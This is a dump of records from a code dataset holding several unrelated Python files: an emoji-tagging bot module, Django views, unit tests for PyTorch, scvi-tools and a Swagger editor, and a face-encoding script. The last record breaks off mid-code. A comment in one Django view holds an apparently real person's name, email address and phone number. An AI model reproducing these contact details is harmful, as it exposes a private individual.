-parameters.COUNT_CONSECUTIVE_UPPER_WORDS_BEFORE_MESSAGE:\n self.ongoingUpperCaseTags -= 1\n\n def tagUpperCountLevel(self):\n if self.currentLanguageHasRomanLetters():\n if self.ongoingUpperCaseTags >= parameters.COUNT_CONSECUTIVE_UPPER_WORDS_BEFORE_MESSAGE:\n return 2\n if self.ongoingUpperCaseTags > -parameters.COUNT_CONSECUTIVE_UPPER_WORDS_BEFORE_MESSAGE:\n return 1\n return 0\n\n def hasSeenEnoughKnownEmoji(self):\n return self.ongoingAlreadyTaggedEmojis >= parameters.MAX_NUMBER_OF_ALREADY_KNOWN_EMOJI_IN_A_ROW\n\n def setDisableDiacriticsWarning(self, value, put=True):\n self.disableDiacriticsWarning = True\n if put:\n self.put()\n\ndef getUserTaggingId(person):\n return person.getLanguageCode() + ' ' + str(person.chat_id)\n\ndef getUserTaggingEntry(person):\n unique_id = getUserTaggingId(person)\n return UserTagging.get_by_id(unique_id)\n\ndef getOrInsertUserTaggingEntry(person):\n userTagginEntry = getUserTaggingEntry(person)\n unique_id = getUserTaggingId(person)\n if not userTagginEntry:\n userTagginEntry = UserTagging(\n id=unique_id,\n chat_id = person.chat_id,\n lang_code = person.getLanguageCode(),\n emojiTagsTable = {}\n )\n userTagginEntry.put()\n return userTagginEntry\n\ndef getNumberUsersWhoHavePlayed(lang_code):\n return UserTagging.query(\n UserTagging.lang_code == lang_code,\n ).count()\n\ndef getLanguagesWithProposedTags():\n entries = UserTagging.query(\n projection=[UserTagging.lang_code],\n distinct=True\n ).fetch()\n return [x.lang_code for x in entries]\n\n###################\n# MAIN CLASS AggregatedEmojiTags\n###################\n\nclass AggregatedEmojiTags(ndb.Model):\n # id = lang_code emoji\n timestamp = ndb.DateTimeProperty(auto_now=True)\n lang_code = ndb.StringProperty()\n emoji = ndb.StringProperty()\n annotators_count = ndb.IntegerProperty(default=0)\n tags_count = ndb.IntegerProperty(default=0)\n tagsCountTable = ndb.PickleProperty() #defaultdict(int)\n\n def getLanguageCode(self):\n return self.lang_code.encode('utf-8')\n\ndef getAggregatedEmojiTagsId(lang_code_utf, emoji_utf):\n return lang_code_utf + ' ' + emoji_utf\n\ndef getAggregatedEmojiTagsEntry(lang_code, emoji_uni):\n unique_id = getAggregatedEmojiTagsId(lang_code, emoji_uni)\n return AggregatedEmojiTags.get_by_id(unique_id)\n\n@ndb.transactional(retries=100, xg=True)\ndef addInAggregatedEmojiTags(userTaggingEntry):\n lang_code_utf = userTaggingEntry.getLanguageCode()\n emoji_utf = userTaggingEntry.getLastEmoji()\n tags = userTaggingEntry.emojiTagsTable[emoji_utf]\n unique_id = getAggregatedEmojiTagsId(lang_code_utf, emoji_utf)\n aggregatedEmojiTags = AggregatedEmojiTags.get_by_id(unique_id)\n if not aggregatedEmojiTags:\n aggregatedEmojiTags = AggregatedEmojiTags(\n id=unique_id,\n parent=None,\n namespace=None,\n lang_code=lang_code_utf,\n emoji=emoji_utf,\n tagsCountTable=defaultdict(int)\n )\n for t in tags:\n aggregatedEmojiTags.tagsCountTable[t] +=1\n aggregatedEmojiTags.annotators_count += 1\n aggregatedEmojiTags.tags_count += len(tags)\n aggregatedEmojiTags.put()\n return aggregatedEmojiTags\n\ndef getPrioritizedEmojiForUser(userTaggingEntry):\n emoji_esclusion_list = userTaggingEntry.emojiTagsTable.keys()\n lang_code = userTaggingEntry.lang_code\n entries = AggregatedEmojiTags.query(\n AggregatedEmojiTags.lang_code == lang_code,\n AggregatedEmojiTags.annotators_count <= parameters.MAX_ANNOTATORS_PER_PRIORITIZED_EMOJI,\n ).order(AggregatedEmojiTags.annotators_count).iter(projection=[AggregatedEmojiTags.emoji])\n for e in entries:\n emoji_utf = e.emoji.encode('utf-8')\n if emoji_utf not in emoji_esclusion_list:\n return emoji_utf\n #logging.debug(\"Discarding {0} because already seen by user\".format(emoji_utf))\n return None\n\n# returns annotatorsCount, tagsCount, stats\ndef getTaggingStats(userTaggingEntry):\n lang_code = userTaggingEntry.getLanguageCode()\n emoji_utf = userTaggingEntry.getLastEmoji()\n aggregatedEmojiTags = getAggregatedEmojiTagsEntry(lang_code, emoji_utf)\n if aggregatedEmojiTags:\n return aggregatedEmojiTags.annotators_count, \\\n aggregatedEmojiTags.tags_count, \\\n aggregatedEmojiTags.tagsCountTable\n return 0, 0, {}\n\n\ndef getStatsFeedbackForTagging(userTaggingEntry, proposedTag):\n annotatorsCount, tagsCount, tagsCountDict = getTaggingStats(userTaggingEntry)\n logging.debug('stats: ' + str(tagsCountDict))\n msg = ''\n if tagsCount == 0:\n msg += \"ðŸ�… You are the first annotator for this term for this emoji!\"\n else:\n msg += '\\n'\n \"\"\"\n if annotatorsCount==1:\n msg += \"{0} person has provided a new term for this emoji:\\n\".format(str(annotatorsCount))\n else:\n msg += \"{0} people have provided new terms for this emoji:\\n\".format(str(annotatorsCount))\n \"\"\"\n agreement = proposedTag in tagsCountDict.keys()\n sortedTagsInDict = sorted(tagsCountDict.keys(), key=tagsCountDict.get, reverse=True)\n if agreement:\n agreementCount = tagsCountDict[proposedTag]\n # CHECK IF TO GO PUBLIC\n if agreementCount + 1 == parameters.MIN_COUNT_FOR_USER_TAG_TO_BE_PUBLIC:\n msg += \"\\n🎉🎉🎉 This tag has reached the required number of votes and will be added in the dictionary!\\n\"\n emojiTables.addUserDefinedTag(userTaggingEntry.getLanguageCode(), userTaggingEntry.getLastEmoji(), proposedTag)\n else:\n if agreementCount == 1:\n msg += \"🎉 1 person agrees with your term! 😊 \\n\"\n else:\n msg += \"🎉 {0} people agree with your term! 😊 \\n\".format(str(agreementCount))\n\n sortedTagsInDict.remove(proposedTag)\n else:\n msg += \"🤔 So far, no one agrees with you.\\n\"\n maxSize = parameters.MAX_NUMBER_OF_DISPLAYED_TAGS_ALTERNATIVE\n for k in sortedTagsInDict[:maxSize]:\n count = tagsCountDict[k]\n msg += \" {0} suggested: {1}\\n\".format(str(count), k)\n restCount = sum( tagsCountDict[k] for k in sortedTagsInDict[maxSize:])\n if restCount>0:\n msg += \" ... {0} suggested other things\".format(str(restCount))\n return msg\n\ndef getNumberOfEmojiBeingTagged(lang_code):\n return AggregatedEmojiTags.query(\n AggregatedEmojiTags.lang_code == lang_code,\n ).count()\n\n#==============================\n# REQUEST HANDLERS\n#==============================\nclass TaggingUserTableHandler(webapp2.RequestHandler):\n def get(self, lang_code):\n #urlfetch.set_default_fetch_deadline(60)\n full = self.request.get('full') == 'true'\n qry = UserTagging.query(UserTagging.lang_code == lang_code)\n result = {}\n for entry in qry:\n user = person.getPersonByChatId(entry.chat_id)\n result[entry.chat_id] = {\n \"name\": user.getFirstName() if user else \"Unknown ({0})\".format(str(entry.chat_id)),\n \"total taggings\": len(entry.emojiTagsTable),\n }\n if full:\n result[entry.chat_id][\"translation table\"] = entry.emojiTagsTable\n self.response.headers['Content-Type'] = 'application/json; charset=utf-8'\n self.response.out.write(json.dumps(result, indent=4, ensure_ascii=False))\n\nclass TaggingAggregatedTableHandler(webapp2.RequestHandler):\n def get(self, lang_code):\n #urlfetch.set_default_fetch_deadline(60)\n qry = AggregatedEmojiTags.query(AggregatedEmojiTags.lang_code==lang_code)\n result = {}\n for entry in qry:\n result[entry.emoji.encode('utf-8')] = {\n \"annotators count\": entry.annotators_count,\n \"tagging table\": entry.tagsCountTable\n }\n self.response.headers['Content-Type'] = 'application/json; charset=utf-8'\n self.response.out.write(json.dumps(result, indent=4, ensure_ascii=False))\n\n#======================\n# VERY DANGEREOUS OPERATIONS\n#======================\n\n\ndef deleteTagging(lang_code=None):\n if lang_code:\n ndb.delete_multi(UserTagging.query(\n UserTagging.lang_code == lang_code).fetch(keys_only=True))\n ndb.delete_multi(AggregatedEmojiTags.query(\n UserTagging.lang_code == lang_code).fetch(keys_only=True))\n ndb.delete_multi(\n emojiTables.LanguageEmojiTag.query(\n emojiTables.LanguageEmojiTag.lang_code == lang_code,\n emojiTables.LanguageEmojiTag.has_users_tags == True).fetch(keys_only=True))\n else:\n ndb.delete_multi(UserTagging.query().fetch(keys_only=True))\n ndb.delete_multi(AggregatedEmojiTags.query().fetch(keys_only=True))\n ndb.delete_multi(\n emojiTables.LanguageEmojiTag.query(\n emojiTables.LanguageEmojiTag.has_users_tags == True).fetch(keys_only=True))\n","repo_name":"unior-nlp-research-group/EmojiWorldBot","sub_path":"userTagging.py","file_name":"userTagging.py","file_ext":"py","file_size_in_byte":11959,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"30399570854","text":"from django.shortcuts import render\nfrom . models import *\nfrom django.http import *\n\n\ndef index(request):\n d=post.objects.all()\n\n for i in d:\n print(i.tittle)\n print(i.text)\n return HttpResponse('Hello')\n return render(request, 'index.html', context_dict)\n\n # Priya\n # priya@gmail.com\n # 9587499937","repo_name":"priyanka-kalaliya/Django","sub_path":"day2/mymodel/myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14825035849","text":"import os\nimport unittest\n\nfrom tools.stats.upload_test_stats import get_tests, summarize_test_cases\n\nIN_CI = os.environ.get(\"CI\")\n\n\nclass TestUploadTestStats(unittest.TestCase):\n @unittest.skipIf(\n IN_CI,\n \"don't run in CI as this does a lot of network calls and uses up GH API rate limit\",\n )\n def test_existing_job(self) -> None:\n \"\"\"Run on a known-good job and make sure we don't error and get basically okay results.\"\"\"\n test_cases = get_tests(2561394934, 1)\n self.assertEqual(len(test_cases), 609873)\n summary = summarize_test_cases(test_cases)\n self.assertEqual(len(summary), 5068)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"pytorch/pytorch","sub_path":"tools/test/test_upload_test_stats.py","file_name":"test_upload_test_stats.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"40569317699","text":"# Train face recognition model\n# Extracts facial features from the images in each sub-folder in the datasets directory\n\nimport os, cv2, pickle, face_recognition\nfrom imutils import paths\n\ndef extract():\n # retrieve the path of each sub-data folder in the datasets folder\n # the datasets folder contains sub-folders containing images of various people\n imgPaths = list(paths.list_images('datasets'))\n\n names, knownEncodings = [], []\n\n # loop through the image paths list\n for (i, imgPath) in enumerate(imgPaths):\n name = imgPath.split(os.path.sep)[-2] # extract person's name from the image path\n\n # load the input image: convert it from OpenCV ordering BGR to dlib ordering RGB\n image = cv2.imread(imgPath)\n rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n # locate faces using the face_recognition library\n boxes = face_recognition.face_locations(rgb, model='hog')\n\n # compute facial embeddings of the face\n encodings = face_recognition.face_encodings(rgb, boxes)\n\n # loop over encodings list\n for encoding in encodings:\n knownEncodings.append(encoding)\n names.append(name)\n\n # save encodings and name in a data dictionary\n data = {\n \"encodings\": knownEncodings,\n \"names\": names\n }\n\n # save the data into a file for use later\n f = open(\"face_enc\", \"wb\")\n f.write(pickle.dumps(data))\n f.close()\n","repo_name":"david-weir/Class-Attendance-and-Face-Mask-Detection","sub_path":"src/feature_extract.py","file_name":"feature_extract.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18667378044","text":"from django.shortcuts import render,redirect, get_object_or_404\nfrom django.http import JsonResponse\nfrom inventory.models import ProductInventory\nfrom .basket import Basket\nfrom checkout.models import Delivery\n# Create your views here.\n\n\n# BASKET LIST\ndef basket_list(request):\n return render(request, 'basket/list.html')\n# END BASKET LIST\n\n\n#ADD BASKET VIEWS\ndef add_basket(request):\n \"\"\"\n Add button this function of role is Grab product info \n using Ajax and response JsonResponse\n \"\"\"\n basket = Basket(request)\n if request.POST.get('action') == 'post':\n quantity = int(request.POST.get('product_quantity'))\n product_id = int(request.POST.get('product_id'))\n product_inventory = get_object_or_404(ProductInventory, pk = product_id)\n basket.add(product_inventory, quantity)\n\n total_quantity = basket.__len__()\n\n response = JsonResponse({'total_qty': total_quantity})\n return response\n#END ADD BASKET VIEWS\n\n\n#UPDATE BASKET VIEWS\ndef update_basket(request):\n basket = Basket(request)\n if request.POST.get('action') == 'post':\n product_quantity = int(request.POST.get('product_quantity'))\n product_id = request.POST.get('product_id')\n basket.update_basket(product_id, product_quantity)\n total_qty = basket.__len__()\n total_price = basket.get_total_price()\n\n response = JsonResponse({'total_price':total_price, 'total_qty': total_qty})\n return response\n\n\n#DELETE BASKET VIEWS\ndef delete_basket(request):\n basket = Basket(request)\n if request.POST.get('action') == 'post':\n product_id = request.POST.get('product_id')\n basket.remove(product_id)\n total_qty = basket.__len__()\n total_price = basket.get_total_price()\n\n response = JsonResponse({'total_price': total_price, 'total_qty': total_qty})\n return response\n#END DELETE BASKET VIEWS\n \n\n# DELIVERY CHANGE OPTIONS RADIO\ndef basket_update_delivery(request):\n basket = Basket(request)\n if request.POST.get('action') == 'post':\n delivery_id = int(request.POST.get(\"deliveryoption\"))\n delivery = get_object_or_404(Delivery, pk = delivery_id)\n total_price = basket.basket_update_delivery(delivery_price=delivery.delivery_price)\n\n session = request.session\n if 'purchase' not in request.session:\n session['purchase'] = {\n 'delivery_id': delivery.id\n }\n else:\n session['purchase']['delivery_id'] = delivery.id\n session.modified = True\n\n response = JsonResponse({\n \"total\": total_price,\n \"delivery_price\": delivery.delivery_price\n })\n return response\n# END DELIVERY CHANGE OPTIONS RADIO\n\n\n","repo_name":"Jetkerpy/obazar-ecommerce","sub_path":"basket/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73846504871","text":"elementos = []\ni = 0\nx = int(input(\"Diga quantos elementos a lista possuirá: \"))\nwhile True:\n n = int(input(\"Informe um valor: \"))\n if n == 0:\n break\n elementos.append(n)\n elementos.sort()\n i +=1\n print(elementos[0:x])","repo_name":"1Sayza/-Python-for-Beginners","sub_path":"QUESTAO 10.py","file_name":"QUESTAO 10.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"33068970841","text":"from typing import Optional\n\nimport mudata\nimport numpy as np\nimport pytest\n\nfrom scvi.data import synthetic_iid\nfrom scvi.external import Tangram\n\nmodalities = {\"density_prior_key\": \"sp\", \"sc_layer\": \"sc\", \"sp_layer\": \"sp\"}\n\n\ndef _get_mdata(sparse_format: Optional[str] = None):\n dataset1 = synthetic_iid(batch_size=100, sparse_format=sparse_format)\n dataset2 = dataset1[-25:].copy()\n dataset1 = dataset1[:-25].copy()\n mdata = mudata.MuData({\"sc\": dataset1, \"sp\": dataset2})\n ad_sp = mdata.mod[\"sp\"]\n rna_count_per_spot = np.asarray(ad_sp.X.sum(axis=1)).squeeze()\n ad_sp.obs[\"rna_count_based_density\"] = rna_count_per_spot / np.sum(\n rna_count_per_spot\n )\n ad_sp.obs[\"bad_prior\"] = np.random.uniform(size=ad_sp.n_obs)\n return mdata\n\n\n@pytest.mark.parametrize(\n \"density_prior_key,constrained\",\n [\n (None, False),\n (\"rna_count_based_density\", False),\n (\"rna_count_based_density\", True),\n ],\n)\ndef test_tangram(density_prior_key, constrained):\n mdata = _get_mdata()\n Tangram.setup_mudata(\n mdata,\n density_prior_key=density_prior_key,\n modalities=modalities,\n )\n if constrained:\n target_count = 2\n else:\n target_count = None\n model = Tangram(mdata, constrained=constrained, target_count=target_count)\n model.train(max_epochs=1)\n mdata.mod[\"sc\"].obsm[\"mapper\"] = model.get_mapper_matrix()\n model.project_cell_annotations(\n mdata.mod[\"sc\"],\n mdata.mod[\"sp\"],\n mdata.mod[\"sc\"].obsm[\"mapper\"],\n mdata.mod[\"sc\"].obs.labels,\n )\n model.project_genes(mdata.mod[\"sc\"], mdata.mod[\"sp\"], mdata.mod[\"sc\"].obsm[\"mapper\"])\n\n\ndef test_tangram_errors():\n mdata = _get_mdata()\n Tangram.setup_mudata(\n mdata,\n density_prior_key=\"rna_count_based_density\",\n modalities=modalities,\n )\n with pytest.raises(ValueError):\n Tangram(mdata, constrained=True, target_count=None)\n\n with pytest.raises(ValueError):\n Tangram.setup_mudata(\n mdata,\n density_prior_key=\"bad_prior\",\n modalities=modalities,\n )\n Tangram(mdata)\n","repo_name":"scverse/scvi-tools","sub_path":"tests/external/test_tangram.py","file_name":"test_tangram.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":1037,"dataset":"github-code","pt":"72"} +{"seq_id":"40016530682","text":"import copy\n\nfrom unittest import TestCase\nfrom mock import Mock\nfrom parameterized import parameterized, param\n\nfrom samtranslator.swagger.swagger import SwaggerEditor\n\n_X_INTEGRATION = \"x-amazon-apigateway-integration\"\n_X_ANY_METHOD = 'x-amazon-apigateway-any-method'\n\nclass TestSwaggerEditor_init(TestCase):\n\n def test_must_raise_on_invalid_swagger(self):\n\n invalid_swagger = {\"paths\": {}} # Missing \"Swagger\" keyword\n with self.assertRaises(ValueError):\n SwaggerEditor(invalid_swagger)\n\n def test_must_succeed_on_valid_swagger(self):\n valid_swagger = {\n \"swagger\": \"2.0\",\n \"paths\": {\n \"/foo\": {},\n \"/bar\": {}\n }\n }\n\n editor = SwaggerEditor(valid_swagger)\n self.assertIsNotNone(editor)\n\n self.assertEquals(editor.paths, {\"/foo\": {}, \"/bar\": {}})\n\n\nclass TestSwaggerEditor_has_path(TestCase):\n\n def setUp(self):\n self.swagger = {\n \"swagger\": \"2.0\",\n \"paths\": {\n \"/foo\": {\n \"get\": {},\n \"somemethod\": {}\n },\n \"/bar\": {\n \"post\": {},\n _X_ANY_METHOD: {}\n },\n \"badpath\": \"string value\"\n }\n }\n\n self.editor = SwaggerEditor(self.swagger)\n\n def test_must_find_path_and_method(self):\n self.assertTrue(self.editor.has_path(\"/foo\"))\n self.assertTrue(self.editor.has_path(\"/foo\", \"get\"))\n self.assertTrue(self.editor.has_path(\"/foo\", \"somemethod\"))\n self.assertTrue(self.editor.has_path(\"/bar\"))\n self.assertTrue(self.editor.has_path(\"/bar\", \"post\"))\n\n def test_must_find_with_method_case_insensitive(self):\n self.assertTrue(self.editor.has_path(\"/foo\", \"GeT\"))\n self.assertTrue(self.editor.has_path(\"/bar\", \"POST\"))\n\n # Only Method is case insensitive. Path is case sensitive\n self.assertFalse(self.editor.has_path(\"/FOO\"))\n\n def test_must_work_with_any_method(self):\n \"\"\"\n Method name \"ANY\" is special. It must be converted to the x-amazon style value before search\n \"\"\"\n self.assertTrue(self.editor.has_path(\"/bar\", \"any\"))\n self.assertTrue(self.editor.has_path(\"/bar\", \"AnY\")) # Case insensitive\n self.assertTrue(self.editor.has_path(\"/bar\", _X_ANY_METHOD))\n self.assertFalse(self.editor.has_path(\"/foo\", \"any\"))\n\n def test_must_not_find_path(self):\n self.assertFalse(self.editor.has_path(\"/foo/other\"))\n self.assertFalse(self.editor.has_path(\"/bar/xyz\"))\n self.assertFalse(self.editor.has_path(\"/abc\"))\n\n def test_must_not_find_path_and_method(self):\n self.assertFalse(self.editor.has_path(\"/foo\", \"post\"))\n self.assertFalse(self.editor.has_path(\"/foo\", \"abc\"))\n self.assertFalse(self.editor.has_path(\"/bar\", \"get\"))\n self.assertFalse(self.editor.has_path(\"/bar\", \"xyz\"))\n\n def test_must_not_fail_on_bad_path(self):\n\n self.assertTrue(self.editor.has_path(\"badpath\"))\n self.assertFalse(self.editor.has_path(\"badpath\", \"somemethod\"))\n\nclass TestSwaggerEditor_has_integration(TestCase):\n\n def setUp(self):\n self.swagger = {\n \"swagger\": \"2.0\",\n \"paths\": {\n \"/foo\": {\n \"get\": {\n _X_INTEGRATION: {\n \"a\": \"b\"\n }\n },\n \"somemethod\": {\n \"foo\": \"value\",\n },\n \"emptyintegration\": {\n _X_INTEGRATION: {}\n },\n \"badmethod\": \"string value\"\n },\n }\n }\n\n self.editor = SwaggerEditor(self.swagger)\n\n def test_must_find_integration(self):\n self.assertTrue(self.editor.has_integration(\"/foo\", \"get\"))\n\n def test_must_not_find_integration(self):\n self.assertFalse(self.editor.has_integration(\"/foo\", \"somemethod\"))\n\n def test_must_not_find_empty_integration(self):\n self.assertFalse(self.editor.has_integration(\"/foo\", \"emptyintegration\"))\n\n def test_must_handle_bad_value_for_method(self):\n self.assertFalse(self.editor.has_integration(\"/foo\", \"badmethod\"))\n\n\nclass TestSwaggerEditor_add_path(TestCase):\n\n def setUp(self):\n\n self.original_swagger = {\n \"swagger\": \"2.0\",\n \"paths\": {\n \"/foo\": {\n \"get\": {\"a\": \"b\"}\n },\n \"/bar\": {},\n \"/badpath\": \"string value\"\n }\n }\n\n self.editor = SwaggerEditor(self.original_swagger)\n\n @parameterized.expand([\n param(\"/new\", \"get\", \"new path, new method\"),\n param(\"/foo\", \"new method\", \"existing path, new method\"),\n param(\"/bar\", \"get\", \"existing path, new method\"),\n ])\n def test_must_add_new_path_and_method(self, path, method, case):\n\n self.assertFalse(self.editor.has_path(path, method))\n self.editor.add_path(path, method)\n\n self.assertTrue(self.editor.has_path(path, method), \"must add for \"+case)\n self.assertEquals(self.editor.swagger[\"paths\"][path][method], {})\n\n def test_must_raise_non_dict_path_values(self):\n\n path = \"/badpath\"\n method = \"get\"\n\n with self.assertRaises(ValueError):\n self.editor.add_path(path, method)\n\n def test_must_skip_existing_path(self):\n \"\"\"\n Given an existing path/method, this must\n :return:\n \"\"\"\n\n path = \"/foo\"\n method = \"get\"\n original_value = copy.deepcopy(self.original_swagger[\"paths\"][path][method])\n\n self.editor.add_path(path, method)\n modified_swagger = self.editor.swagger\n self.assertEquals(original_value, modified_swagger[\"paths\"][path][method])\n\n\nclass TestSwaggerEditor_add_lambda_integration(TestCase):\n\n def setUp(self):\n\n self.original_swagger = {\n \"swagger\": \"2.0\",\n \"paths\": {\n \"/foo\": {\n \"post\": {\n \"a\": [1, 2, \"b\"],\n \"responses\": {\n \"something\": \"is already here\"\n }\n }\n },\n \"/bar\": {\n \"get\": {\n _X_INTEGRATION: {\n \"a\": \"b\"\n }\n }\n },\n }\n }\n\n self.editor = SwaggerEditor(self.original_swagger)\n\n def test_must_add_new_integration_to_new_path(self):\n path = \"/newpath\"\n method = \"get\"\n integration_uri = \"something\"\n expected = {\n \"responses\": {},\n _X_INTEGRATION: {\n \"type\": \"aws_proxy\",\n \"httpMethod\": \"POST\",\n \"uri\": integration_uri\n }\n }\n\n self.editor.add_lambda_integration(path, method, integration_uri)\n\n self.assertTrue(self.editor.has_path(path, method))\n actual = self.editor.swagger[\"paths\"][path][method]\n self.assertEquals(expected, actual)\n\n def test_must_add_new_integration_to_existing_path(self):\n path = \"/foo\"\n method = \"post\"\n integration_uri = \"something\"\n expected = {\n # Current values present in the dictionary *MUST* be preserved\n \"a\": [1, 2, \"b\"],\n\n # Responses key must be untouched\n \"responses\": {\n \"something\": \"is already here\"\n },\n\n # New values must be added\n _X_INTEGRATION: {\n \"type\": \"aws_proxy\",\n \"httpMethod\": \"POST\",\n \"uri\": integration_uri\n }\n }\n\n # Just make sure test is working on an existing path\n self.assertTrue(self.editor.has_path(path, method))\n\n self.editor.add_lambda_integration(path, method, integration_uri)\n\n actual = self.editor.swagger[\"paths\"][path][method]\n self.assertEquals(expected, actual)\n\n def test_must_raise_on_existing_integration(self):\n\n with self.assertRaises(ValueError):\n self.editor.add_lambda_integration(\"/bar\", \"get\", \"integrationUri\")\n\n\nclass TestSwaggerEditor_iter_on_path(TestCase):\n\n def setUp(self):\n\n self.original_swagger = {\n \"swagger\": \"2.0\",\n \"paths\": {\n \"/foo\": {},\n \"/bar\": {},\n \"/baz\": \"some value\"\n }\n }\n\n self.editor = SwaggerEditor(self.original_swagger)\n\n def test_must_iterate_on_paths(self):\n\n expected = {\"/foo\", \"/bar\", \"/baz\"}\n actual = set([path for path in self.editor.iter_on_path()])\n\n self.assertEquals(expected, actual)\n\n\nclass TestSwaggerEditor_add_cors(TestCase):\n\n def setUp(self):\n\n self.original_swagger = {\n \"swagger\": \"2.0\",\n \"paths\": {\n \"/foo\": {},\n \"/withoptions\": {\n \"options\": {\"some\": \"value\"}\n },\n \"/bad\": \"some value\"\n }\n }\n\n self.editor = SwaggerEditor(self.original_swagger)\n\n def test_must_add_options_to_new_path(self):\n allowed_origins = \"origins\"\n allowed_headers = [\"headers\", \"2\"]\n allowed_methods = {\"key\": \"methods\"}\n max_age = 60\n path = \"/foo\"\n expected = {\"some cors\": \"return value\"}\n\n self.editor._options_method_response_for_cors = Mock()\n self.editor._options_method_response_for_cors.return_value = expected\n\n self.editor.add_cors(path, allowed_origins, allowed_headers, allowed_methods, max_age)\n self.assertEquals(expected, self.editor.swagger[\"paths\"][path][\"options\"])\n self.editor._options_method_response_for_cors.assert_called_with(allowed_origins,\n allowed_headers,\n allowed_methods,\n max_age)\n\n def test_must_skip_existing_path(self):\n path = \"/withoptions\"\n expected = copy.deepcopy(self.original_swagger[\"paths\"][path][\"options\"])\n\n self.editor.add_cors(path, \"origins\", \"headers\", \"methods\")\n self.assertEquals(expected, self.editor.swagger[\"paths\"][path][\"options\"])\n\n def test_must_fail_with_bad_values_for_path(self):\n path = \"/bad\"\n\n with self.assertRaises(ValueError):\n self.editor.add_cors(path, \"origins\", \"headers\", \"methods\")\n\n def test_must_fail_for_invalid_allowed_origin(self):\n\n path = \"/foo\"\n with self.assertRaises(ValueError):\n self.editor.add_cors(path, None, \"headers\", \"methods\")\n\n def test_must_work_for_optional_allowed_headers(self):\n\n allowed_origins = \"origins\"\n allowed_headers = None # No Value\n allowed_methods = \"methods\"\n max_age = 60\n\n expected = {\"some cors\": \"return value\"}\n path = \"/foo\"\n\n self.editor._options_method_response_for_cors = Mock()\n self.editor._options_method_response_for_cors.return_value = expected\n\n self.editor.add_cors(path, allowed_origins, allowed_headers, allowed_methods, max_age)\n\n self.assertEquals(expected, self.editor.swagger[\"paths\"][path][\"options\"])\n\n self.editor._options_method_response_for_cors.assert_called_with(allowed_origins,\n allowed_headers,\n allowed_methods,\n max_age)\n\n def test_must_make_default_value_with_optional_allowed_methods(self):\n\n allowed_origins = \"origins\"\n allowed_headers = \"headers\"\n allowed_methods = None # No Value\n max_age = 60\n\n default_allow_methods_value = \"some default value\"\n default_allow_methods_value_with_quotes = \"'{}'\".format(default_allow_methods_value)\n expected = {\"some cors\": \"return value\"}\n path = \"/foo\"\n\n self.editor._make_cors_allowed_methods_for_path = Mock()\n self.editor._make_cors_allowed_methods_for_path.return_value = default_allow_methods_value\n\n self.editor._options_method_response_for_cors = Mock()\n self.editor._options_method_response_for_cors.return_value = expected\n\n self.editor.add_cors(path, allowed_origins, allowed_headers, allowed_methods, max_age)\n\n self.assertEquals(expected, self.editor.swagger[\"paths\"][path][\"options\"])\n\n self.editor._options_method_response_for_cors.assert_called_with(allowed_origins,\n allowed_headers,\n # Must be called with default value.\n # And value must be quoted\n default_allow_methods_value_with_quotes,\n max_age)\n\n\nclass TestSwaggerEditor_options_method_response_for_cors(TestCase):\n\n def test_correct_value_is_returned(self):\n self.maxDiff = None\n headers = \"foo\"\n methods = {\"a\": \"b\"}\n origins = [1,2,3]\n max_age = 60\n\n expected = {\n \"summary\": \"CORS support\",\n \"consumes\": [\"application/json\"],\n \"produces\": [\"application/json\"],\n _X_INTEGRATION: {\n \"type\": \"mock\",\n \"requestTemplates\": {\n \"application/json\": \"{\\n \\\"statusCode\\\" : 200\\n}\\n\"\n },\n \"responses\": {\n \"default\": {\n \"statusCode\": \"200\",\n \"responseParameters\": {\n \"method.response.header.Access-Control-Allow-Headers\": headers,\n \"method.response.header.Access-Control-Allow-Methods\": methods,\n \"method.response.header.Access-Control-Allow-Origin\": origins,\n \"method.response.header.Access-Control-Max-Age\": max_age\n },\n \"responseTemplates\": {\n \"application/json\": \"{}\\n\"\n }\n }\n }\n },\n \"responses\": {\n \"200\": {\n \"description\": \"Default response for CORS method\",\n \"headers\": {\n \"Access-Control-Allow-Headers\": {\n \"type\": \"string\"\n },\n \"Access-Control-Allow-Methods\": {\n \"type\": \"string\"\n },\n \"Access-Control-Allow-Origin\": {\n \"type\": \"string\"\n },\n \"Access-Control-Max-Age\": {\n \"type\": \"integer\"\n }\n }\n }\n }\n }\n\n actual = SwaggerEditor(SwaggerEditor.gen_skeleton())._options_method_response_for_cors(origins, headers, methods, max_age)\n self.assertEquals(expected, actual)\n\n def test_allow_headers_is_skipped_with_no_value(self):\n headers = None # No value\n methods = \"methods\"\n origins = \"origins\"\n\n expected = {\n \"method.response.header.Access-Control-Allow-Methods\": methods,\n \"method.response.header.Access-Control-Allow-Origin\": origins\n }\n\n expected_headers = {\n \"Access-Control-Allow-Methods\": {\n \"type\": \"string\"\n },\n \"Access-Control-Allow-Origin\": {\n \"type\": \"string\"\n }\n }\n\n options_config = SwaggerEditor(SwaggerEditor.gen_skeleton())._options_method_response_for_cors(\n origins, headers, methods)\n\n actual = options_config[_X_INTEGRATION][\"responses\"][\"default\"][\"responseParameters\"]\n self.assertEquals(expected, actual)\n self.assertEquals(expected_headers, options_config[\"responses\"][\"200\"][\"headers\"])\n\n def test_allow_methods_is_skipped_with_no_value(self):\n headers = \"headers\"\n methods = None # No value\n origins = \"origins\"\n\n expected = {\n \"method.response.header.Access-Control-Allow-Headers\": headers,\n \"method.response.header.Access-Control-Allow-Origin\": origins\n }\n\n options_config = SwaggerEditor(SwaggerEditor.gen_skeleton())._options_method_response_for_cors(\n origins, headers, methods)\n\n actual = options_config[_X_INTEGRATION][\"responses\"][\"default\"][\"responseParameters\"]\n self.assertEquals(expected, actual)\n\n def 